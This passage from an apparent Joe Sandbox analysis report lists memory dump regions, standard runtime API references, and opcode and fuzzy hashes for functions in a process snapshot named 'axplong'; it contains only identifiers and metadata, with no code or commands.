                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: P#"$P#"
                    • API String ID: 2970364248-2896502121
                    • Opcode ID: fd97e78eb59343eb2c2b4bbf2fe4fbc52ac1dbdd89bac6f62fa144e02e4ffd63
                    • Instruction ID: ba110e0042a77914fc4872160e7763eef73e0c1c886db88a09521c9b03d22f41
                    • Opcode Fuzzy Hash: fd97e78eb59343eb2c2b4bbf2fe4fbc52ac1dbdd89bac6f62fa144e02e4ffd63
                    • Instruction Fuzzy Hash: 0771A171E20218EBDB04CFA8D881BDDFBB4EF58310F54811DE805A7281EB75A954CBA5
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00222B23
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#"$P#"$This function cannot be called on a default constructed task
                    • API String ID: 2659868963-2998974727
                    • Opcode ID: af8ae61c58b12c7b846ec5aff722558232ed35eaab8ad6db81d0c034559f8617
                    • Instruction ID: 291b139847d269c33fcd17ffa19109e1be6e3d131e1beb9c7b96c66192e8cab1
                    • Opcode Fuzzy Hash: af8ae61c58b12c7b846ec5aff722558232ed35eaab8ad6db81d0c034559f8617
                    • Instruction Fuzzy Hash: D9F09670D3030CABC714DFA8A84199EF7EDDF15300F5081AEF848A7601EB71AA688B95
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 0022247E
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: 'k#d+($P#"$P#"
                    • API String ID: 2659868963-3723187383
                    • Opcode ID: 9df985d4579ec157d5401926298dd56e5b1aaa00ab3f1b827a1fd6d6c705a271
                    • Instruction ID: 27d98224efad60d437139ea30533f8c87efe5b37009a8aa7cdfb4d6e72e5f77e
                    • Opcode Fuzzy Hash: 9df985d4579ec157d5401926298dd56e5b1aaa00ab3f1b827a1fd6d6c705a271
                    • Instruction Fuzzy Hash: 41F0E5B6D3020DA7C714FFE4D841889B3ACDE15340B408A25FA44EB500F7B0FA6C8B96
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction ID: c19ab86e7ff80246ab34c2cb75e398099d9ff19b43fcfedc9eea56de4bbb47c0
                    • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                    • Instruction Fuzzy Hash: 94B136329203469FDB15CF28C8817AEBBF5EF55306F2481AADC459B341E6348D59CB68
                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Xtime_diff_to_millis2_xtime_get
                    • String ID:
                    • API String ID: 531285432-0
                    • Opcode ID: 463e9cd024a9a041649b3fc19b852fa2a9a8639fa1b277c9fa1bc964e7a7f596
                    • Instruction ID: 89a64d4aa552f06ebff974c441e36436b52901475f1327827e9b42f0bcb51173
                    • Opcode Fuzzy Hash: 463e9cd024a9a041649b3fc19b852fa2a9a8639fa1b277c9fa1bc964e7a7f596
                    • Instruction Fuzzy Hash: 25217FB2E112099FDF01EFA4DC859AEBBB8EF08714F100026FA01B7251DB30AD118FA1
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 0023726C
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: @."$`z#
                    • API String ID: 3366076730-1341170018
                    • Opcode ID: 98745617a1373c37cb361cdb6ef87c20de5d7b83f2fb18b49407e47c99181d58
                    • Instruction ID: d2543cd71dfccf38c9f44d3429b550f7cd083620c67c91a4a04aaf001132a40e
                    • Opcode Fuzzy Hash: 98745617a1373c37cb361cdb6ef87c20de5d7b83f2fb18b49407e47c99181d58
                    • Instruction Fuzzy Hash: 78A127B1E11615CFDB21CFA8C98479EBBF0AF48710F14815AE85AAB351D7759D01CF80
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___free_lconv_mon
                    • String ID: 8"($`'(
                    • API String ID: 3903695350-901913957
                    • Opcode ID: 163fb4566d27a3718d02fd2bf6a86352a06686bcfe4593981d981ddebc8b9e77
                    • Instruction ID: 32cdedc480df7d6f3633604ed658283d61d26280de953acd669b57cc6611dfe8
                    • Opcode Fuzzy Hash: 163fb4566d27a3718d02fd2bf6a86352a06686bcfe4593981d981ddebc8b9e77
                    • Instruction Fuzzy Hash: EB318F7152030AAFEB60AF39DA06B5673E8AF00313F50456AEC4AD7191DF71EC688B19
                    APIs
                    • __Mtx_init_in_situ.LIBCPMT ref: 00223962
                    • __Mtx_init_in_situ.LIBCPMT ref: 002239A1
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_init_in_situ
                    • String ID: pB"
                    • API String ID: 3366076730-3164593441
                    • Opcode ID: 04ab061a81a37bd5d04d0cc61b18da6ca2fc7647d29226caef7d605704573531
                    • Instruction ID: 4543e72c6692b322dce84055172510cc254b48fcf15093ed585bd7a69a145750
                    • Opcode Fuzzy Hash: 04ab061a81a37bd5d04d0cc61b18da6ca2fc7647d29226caef7d605704573531
                    • Instruction Fuzzy Hash: 664135B0501B069FD720CF59C588B5ABBF0FF44315F108619E96A8B341EBB9EA65CF80
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00222552
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.3450902029.0000000000221000.00000040.00000001.01000000.00000007.sdmp, Offset: 00220000, based on PE: true
                    • Associated: 00000005.00000002.3450871073.0000000000220000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450902029.0000000000282000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3450991567.0000000000289000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000028B000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000418000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.00000000004E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.0000000000517000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000051E000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3451017318.000000000052D000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453445002.000000000052E000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453586085.00000000006C3000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453609962.00000000006C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453634749.00000000006C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000005.00000002.3453658601.00000000006C6000.00000080.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_220000_axplong.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy
                    • String ID: P#"$P#"
                    • API String ID: 2659868963-2896502121
                    • Opcode ID: e4d21caa2489085ddeb4889c84a56f4adc607687f116906742a5673dc91d5f78
                    • Instruction ID: 2a27a12427a4fcccb93fd8d286609564796d82b080ac963ec5d0f5305c47fc05
                    • Opcode Fuzzy Hash: e4d21caa2489085ddeb4889c84a56f4adc607687f116906742a5673dc91d5f78
                    • Instruction Fuzzy Hash: 55F08275D2120DDBC714DF68D84198EBBF8AF59300F1082AEE844A7240EA715A688F99